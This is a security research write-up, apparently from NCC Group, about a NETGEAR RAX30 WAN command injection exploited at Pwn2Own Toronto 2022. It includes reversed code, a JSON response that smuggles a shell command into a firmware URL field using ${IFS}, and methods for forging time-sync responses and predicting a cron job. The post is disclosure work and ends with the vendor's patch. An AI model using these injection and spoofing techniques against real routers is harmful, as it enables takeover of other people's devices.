Saltar a la navegación Saltar al contenido principal Ir al pie de página

Puckungfu 2: Another NETGEAR WAN Command Injection

09 febrero 2024

By McCaulay Hudson

Summary

Previously we posted details on a NETGEAR WAN Command Injection identified during Pwn2Own Toronto 2022, titled Puckungfu: A NETGEAR WAN Command Injection.

The exploit development group (EDG) at NCC Group were working on finding and developing exploits for multiple months prior to the Pwn2Own Toronto 2022 event, and managed to identify a large number of zero day vulnerabilities for the event across a range of targets.

However, NETGEAR released a patch a few days prior to the event, which patched the specific vulnerability we were planning on using at Pwn2Own Toronto 2022, wiping out our entry for the NETGEAR WAN target, or so we thought…

The NETGEAR /bin/pucfu binary executes during boot, and performs multiple HTTPS requests to the domains devcom.up.netgear.com and devicelocation.ngxcld.com. We used a DHCP server to control the DNS server that is assigned to the router’s WAN interface. By controlling the response of the DNS lookups, we can cause the router to talk to our own web server. An HTTPS web server using a self-signed certificate was used to handle the HTTPS request, which succeeded due to improper certificate validation (as described in StarLabs’ The Last Breath of Our Netgear RAX30 Bugs – A Tragic Tale before Pwn2Own Toronto 2022 post). Our web server then responded with multiple specially crafted JSON responses that end up triggering a command injection in /bin/pufwUpgrade which is executed by a cron job.

Vulnerability details

Storing /tmp/fw/cfu_url_cache

The following code has been reversed engineered using Ghidra, and shows how an attacker-controlled URL is retrieved from a remote web server and stored locally in the file /tmp/fw/cfu_url_cache.

/bin/pucfu

The following snippet of code shows the get_check_fw function is called in /bin/pucfu, which retrieves the JSON URL from https://devcom.up.netgear.com/UpBackend/checkFirmware/ and stores it in the bufferLargeA variable. bufferLargeA is then copied to bufferLargeB and passed to the SetFileValue function as the value parameter. This stores the retrieved URL in the /tmp/fw/cfu_url_cache file for later use.

int main(int argc,char **argv)
{
    ...
    // Perform API call to retrieve data
    // Retrieve attacker controlled data into bufferLargeA
    status = get_check_fw(callMode, 0, bufferLargeA, 0x800);
    ...
    // Set reason / lastURL / lastChecked in /tmp/fw/cfu_url_cache
    sprintf(bufferLargeB, "%d", callMode);
    SetFileValue("/tmp/fw/cfu_url_cache", "reason", bufferLargeB);

    strcpy(bufferLargeB, bufferLargeA);
    // Attacker controlled data passed as value parameter
    SetFileValue("/tmp/fw/cfu_url_cache", "lastURL", bufferLargeB);

    time _time = time((time_t *)0x0);
    sprintf(bufferLargeB, "%lu", _time);
    SetFileValue("/tmp/fw/cfu_url_cache", "lastChecked", bufferLargeB);
    ...
}

/usr/lib/libfwcheck.so

The get_check_fw function defined in /usr/lib/libfwcheck.so prepares request parameters from the device settings, such as the device model, and calls fw_check_api passing through the URL buffer from main.

int get_check_fw(int mode, byte betaAcceptance, char *urlBuffer, size_t urlBufferSize)
{
    ...
    char upBaseUrl[136];
    char deviceModel[64];
    char fwRevision[64];
    char fsn[16];
    uint region;

    // Retrieve data from D2
    d2_get_ascii(DAT_00029264, "UpCfg", 0,"UpBaseURL", upBaseUrl, 0x81);
    d2_get_string(DAT_00029264, "General", 0,"DeviceModel", deviceModel, 0x40);
    d2_get_ascii(DAT_00029264, "General", 0,"FwRevision", fwRevision, 0x40);
    d2_get_ascii(DAT_00029264, "General", 0,  DAT_000182ac, fsn, 0x10);
    d2_get_uint(DAT_00029264, "General", 0, "Region",  region);

    // Call Netgear API and store response URL into urlBuffer
    ret = fw_check_api(
        upBaseUrl, deviceModel, fwRevision, fsn,
        region, mode, betaAcceptance, urlBuffer, urlBufferSize
    );
    ...
}

The fw_check_api function performs a POST request to the endpoint with the data as a JSON body. The JSON response is then parsed and the url data value is copied to the urlBuffer parameter.

uint fw_check_api(
    char *baseUrl, char *modelNumber, char *currentFwVersion,
    char *serialNumber, uint regionCode, int reasonToCall,
    byte betaAcceptance, char *urlBuffer, size_t urlBufferSize
)
{
    ...
    // Build JSON request
    char json[516];
    snprintf(json, 0x200,
        "{\"token\":\"%s\",\"ePOCHTimeStamp\":\"%s\",\"modelNumber\":\"%s\","
        "\"serialNumber\":\"%s \",\"regionCode\":\"%u\",\"reasonToCall\":\"%d\","
        "\"betaAcceptance\":%d,\"currentFWVersion \":\"%s\"}",
        token, epochTimestamp, modelNumber, serialNumber, regionCode, reasonToCall,
        (uint)betaAcceptance, currentFwVersion);

    snprintf(checkFwUrl, 0x80, "%s%s", baseUrl, "checkFirmware/");

    // Perform HTTPS request
    int status = curl_post(checkFwUrl, json,  response);
    char* _response = response;

    ...

    // Parse JSON response
    cJSON *jsonObject = cJSON_Parse(_response);

    // Get status item
    cJSON *jsonObjectItem = cJSON_GetObjectItem(jsonObject, "status");
    if ((jsonObjectItem != (cJSON *)0x0)    (jsonObjectItem->type == cJSON_Number)) {
        state = 0;
        (*(code *)fw_debug)(1,"\nStatus 1 received\n");

        // Get URL item
        cJSON *jsonObjectItemUrl = cJSON_GetObjectItem(jsonObject,"url");

        // Copy url into url buffer
        int snprintfSize = snprintf(
            urlBuffer,
            urlBufferSize,
            "%s",
            jsonObjectItemUrl->valuestring
        );
        ...
        return state;
    }
    ...
}

The curl_post function performs an HTTPS POST request using curl_easy. During this request, verification of the SSL certificate returned by the web server, and the check to ensure the server’s host name matches the host name in the SSL certificate are both disabled. This means that it will make a request to any server that we can convince it to use, allowing us to control the content of the lastURL value in the /tmp/fw/cfu_url_cache file.

size_t curl_post(char *url, char *json, char **response)
{
    ...
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, curlSList);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, json);
    // Host name vs SSL certificate host name checks disabled
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0);
    // SSL certificate verification disabled
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0);
    ...
}

pufwUpgrade -A

Next, pufwUpgrade -A is called from a cron job defined in /var/spool/cron/crontabs/cfu which executes at a random time between 01:00am and 04:00am.

This triggers the PuCFU_Check function to be called, which reads the lastURL value from /tmp/fw/cfu_url_cache into the global variable gLastUrl:

int PuCFU_Check(int param_1)
{
    ...
    iVar2 = GetFileValue("/tmp/fw/cfu_url_cache", "lastURL",  lastUrl, 0x800);
    ...
    DBG_PRINT("%s:%d urlVal=%s\n", "PuCFU_Check", 0x102,  lastUrl);
    snprintf( gLastUrl, 0x800, "%s",  lastUrl);
    ...

Then, checkFirmware is called which saves the gLastUrl value to the Img_url key in /data/fwLastChecked:

int checkFirmware(int param_1)
{
    ...
    snprintf(Img_url, 0x400, "%s",  gLastUrl);
    ...
    SetFileValue("/data/fwLastChecked", "Img_url", Img_url);
    ...

The FwUpgrade_DownloadFW function is later called which retrieves the Img_url value from /data/fwLastChecked, and if downloading the file from that URL succeeds due to a valid HTTP URL, proceeds to call saveCfuLastFwpath:

int FwUpgrade_DownloadFW()
{
    ...
    iVar1 = GetFileValue("/data/fwLastChecked", "Img_url",  fileValueBuffer, 0x400);
    ...
    snprintf(Img_url, 0x400, "%s",  fileValueBuffer);
    ...
    snprintf(imageUrl, 0x801, "%s/%s/%s", Img_url,  regionName, Img_file);
    ...
    do {
        ...
        uVar2 = DownloadFiles( imageUrl, "/tmp/fw/dl_fw", "/tmp/fw/dl_result", 0);
        if (uVar2 == 0) {
            iVar1 = GetDLFileSize("/tmp/fw/dl_fw");
            if (iVar1 != 0) {
                ...
                snprintf(fileValueBuffer, 0x801, "%s/%s", Img_url,  regionName);
                saveCfuLastFwpath(fileValueBuffer);
                ...

Finally, the saveCfuLastFwpath function (vulnerable to a command injection) is called with a parameter whose value contains the Img_url that we control. This string is formatted and then passed to the system command:

int saveCfuLastFwpath(char *fwPath)
{
    char command [1024];
    memset(command, 0, 0x400);
    snprintf(command, 0x400, "rm %s", "/data/cfu_last_fwpath");
    system(command);
    // Command injection vulnerability
    snprintf(command, 0x400, "echo \"%s\" > %s", fwPath, "/data/cfu_last_fwpath");
    DBG_PRINT( DAT_0001620f, command);
    system(command);
    return 0;
}

Example checkFirmware HTTP request/response

Request

The following request is a typical JSON payload for the HTTP request performed by the pucfu binary to retrieve the check firmware URL.

{
    "token": "5a4e4c697a2c40a7f24ae51381abbcea1aeadff2e31d5a2f49cc0f26e3e2219e",
    "ePOCHTimeStamp": "1646392475",
    "modelNumber": "RAX30",
    "serialNumber": "6LA123BC456D7",
    "regionCode": "2",
    "reasonToCall": "1",
    "betaAcceptance": 0,
    "currentFWVersion": "V1.0.7.78"
}

Response

The following response is a typical response received from the https://devcom.up.netgear.com/UpBackend/checkFirmware/ endpoint.

{
    "status": 1,
    "errorCode": null,
    "message": null,
    "url": "https://http.fw.updates1.netgear.com/rax30/auto"
}

Command injection response

The following response injects the command echo 1 > /sys/class/leds/led_usb/brightness into the URL parameter, which results in the USB 3.0 LED lighting up on the router.

{
    "status": 1,
    "errorCode": null,
    "message": null,
    "url": "http://192.168.20.1:8888/fw/\";echo\\${IFS}'1'>/sys/class/leds/led_usb/brightness;\""
}

The URL must be a valid URL in order to successfully download it, therefore characters such as a space are not valid. The use of ${IFS} is a known technique to avoid using the space character.

Triggering in Pwn2Own

As you may recall, this vulnerability is randomly triggered between 01:00am and 04:00am each night, due to the /var/spool/cron/crontabs/cfu cron job. However, the requirements for Pwn2Own are that it must execute within 5 minutes of starting the attempt. Achieving this turned out to be more complex than finding and exploiting the vulnerability itself.

To overcome this issue, we had to find a way to remotely trigger the cron job. To do this, we needed to have the ability to control the time of the device. Additionally, we also had to predict the random time between 01:00am and 04:00am that the cron job would trigger at.

Controlling the device time

During our enumeration and analysis, we identified an HTTPS POST request which was sent to the URL https://devicelocation.ngxcld.com/device-location/syncTime. By changing the DNS lookup to resolve to our web server, we again could forge fake responses as the SSL certificate was not validated.

A typical JSON response for this request can be seen below:

{
    "_type": "CurrentTime",
    "timestamp": 1669976886,
    "zoneOffset": 0
}

Upon receiving the response, the router sets its internal date/time to the given timestamp. Therefore, by responding to this HTTPS request, we can control the exact date and time of the router in order to trigger the cron job.

Predicting the cron job time

Now that we can control the date and time of the router, we need to know the exact timestamp to set the device to, in order to trigger the cron job within 1 minute for the competition. To do this, we reverse engineered the logic which randomly sets the cron job time.

It was identified that the command pufwUpgrade -s runs on boot, which randomly sets the hour and minute part of a cron job time in /var/spool/cron/crontabs/cfu.

The code to do this was reversed to the following:

int main(int argc, char** argv)
{
    ...

    // Set the seed based on epoch timestamp
    int __seed = time(0);
    srand(__seed);

    // Get the next random number
    int r = rand();

    // Calculate the hours / minutes
    int cMins = (r % 180) % 60;
    int cHours = floor((double)(r % 180) / 60.0) + 1;

    // Set the crontab
    char command[512];
    snprintf(
        command,
        0x1ff,
        "echo \"%d %d * * * /bin/pufwUpgrade -A \" >> %s/%s",
        cHours,
        cMins,
        "/var/spool/cron/crontabs",
        "cfu"
    );
    pegaSystem(command);

    ...
}

As we can see, the rand seed is set via srand using the current device time. Therefore, by setting the seed to the exact value that is returned from time when this code is run, we can predict the next value returned by rand. By predicting the next value returned by rand, we can predict the randomly generated hour and minute values for the cron entry written into /var/spool/cron/crontabs.

For this, we first get the current timestamp of the device from the checkFirmware request we saw earlier:

...
"ePOCHTimeStamp": "1646392475",
...

Next, we calculate the number of seconds that have occurred between receiving this device timestamp, and the time(0) function call occurring. We do this by viewing the hour and minute values written into /var/spool/cron/crontabs on the device, and then brute forcing the timestamps starting from the ePOCHTimeStamp until a match is found.

Although the boot time varied, the difference was consistently less than 1 second. From our testing, the most common time it took from the ePOCHTimeStamp being received to reaching the time(0) function call was 66 seconds, followed by 65 seconds.

Therefore, by using a combination of receiving the current timestamp of the device and knowing that on average it would take 66 seconds to reach the time(0), we could determine the next value returned by rand, thereby knowing the exact timestamp that would be set for the cron job to trigger. Finally, responding to the syncTime HTTPS request to set the timestamp to 1 minute before the cron job executes.

Geographical Differences?

Pwn2Own Toronto was a day away, and some of the exploit development group (EDG) members traveled to Toronto, Canada for the competition. However, when doing final tests in the hotel before the event, the vulnerability was not triggering as expected.

After hours of testing, it turned out that the average time to boot had changed from 66 seconds to 73 seconds! We are not sure why the device boot time changed from our testing in the UK to our testing in Canada.

Did it work?

All in all, it was a bit of a gamble on if this vulnerability was going to work, as the competition only allows you to attempt the exploit 3 times, with a time limit of 5 minutes per attempt. Therefore, our random chance needed to work at least once in three attempts.

Luckily for us, the timing change and predictions worked out and we successfully exploited the NETGEAR on the WAN interface as seen on Twitter.

Unfortunately the SSL validation issue was classed as a collision and N-Day as the StarLabs blog post was released prior to the event, however all other vulnerabilities were unique zero days.

Patch

The patch released by NETGEAR was to enable SSL verification on the curl HTTPS request as seen below:

size_t curl_post(char *url, char *json, char **response)
{
    ...
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, curlSList);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, json);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 2);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1);
    ...
}

This will prevent an attacker using a self-signed web application from sending malicious responses, however the saveCfuLastFwpath function containing the system call itself was not modified as part of the patch.

Conclusion

If this interests you, the following blog posts cover more research from Pwn2Own Toronto 2022:

You can also keep notified of future research from the following Twitter profiles: